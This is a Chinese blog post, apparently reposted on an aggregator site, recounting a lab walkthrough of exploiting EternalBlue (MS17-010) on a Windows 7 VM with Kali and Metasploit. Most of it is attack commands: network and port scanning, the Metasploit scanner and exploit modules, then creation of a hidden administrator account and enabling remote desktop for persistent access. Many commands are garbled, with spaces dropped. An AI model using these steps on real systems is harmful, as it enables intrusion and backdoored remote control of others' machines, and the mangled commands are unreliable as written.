永恒之蓝漏洞(445端⼝)详细利⽤过程
永恒之蓝(445端⼝)完整利⽤过程
前⼏天有⼀次⽐赛的时候接触到了永恒之蓝漏洞,之前也没复现过永恒之蓝漏洞,在查资料⽅⾯花费了很多时间,就想着写篇博客记录⼀下。
前置环境:
kali,win7虚拟机,msf(kali⾃带)
⼀·扫描⽹络中存活主机
使⽤命令:
netdiscover-ieth0-r192.168.1.1/24
PS:由于这⾥使⽤的是虚拟机,所以⽹卡显⽰为VMware
⼆·扫描当前主机存活端⼝
使⽤命令:
nmap-sV-n192.168.1.1
三·开启MSF并利⽤搜索并检测是否能利⽤永恒之蓝
开启MSF:
msfconsole
检测永恒之蓝是否能利⽤:
archms17-010
uauxiliary/scanner/smb/smb_ms17_010
tRHOST192.168.1.2
经过检测可以发现永恒之蓝漏洞可以利⽤
四·利⽤永恒之蓝漏洞
uexploit/windows/smb/ms17_010_eternalblue
剩下的命令不再做⽂本解释
成功获得shell
=================================================================
so,获得shell之后应该做什么呢
新建⼀个⽤户,以便下次访问。并将该⽤户升为管理员权限,这样就可以拥有更⼤的权限了
新建⽤户并添加到管理员中
neturtaotao123/add
netlocalgroupadministratorstaotao/add
查看是否成功操作
netur查看本地⽤户列表
netlocalgroupadministrators
但是光有shell权限太不⽅便了,再开启⼀个3389⽅便远程连接
远程连接之前需要判断对⽅⽤户在不在线
开启远程桌⾯服务
wmicRDTOGGLEWHEREServerName='%COMPUTERNAME%'callSetAllowTSConnections1
本文发布于:2023-03-15 18:13:57,感谢您对本站的认可!
本文链接:https://www.wtabcd.cn/fanwen/zuowen/1678875238266231.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
本文word下载地址:445端口.doc
本文 PDF 下载地址:445端口.pdf
留言与评论(共有 0 条评论) |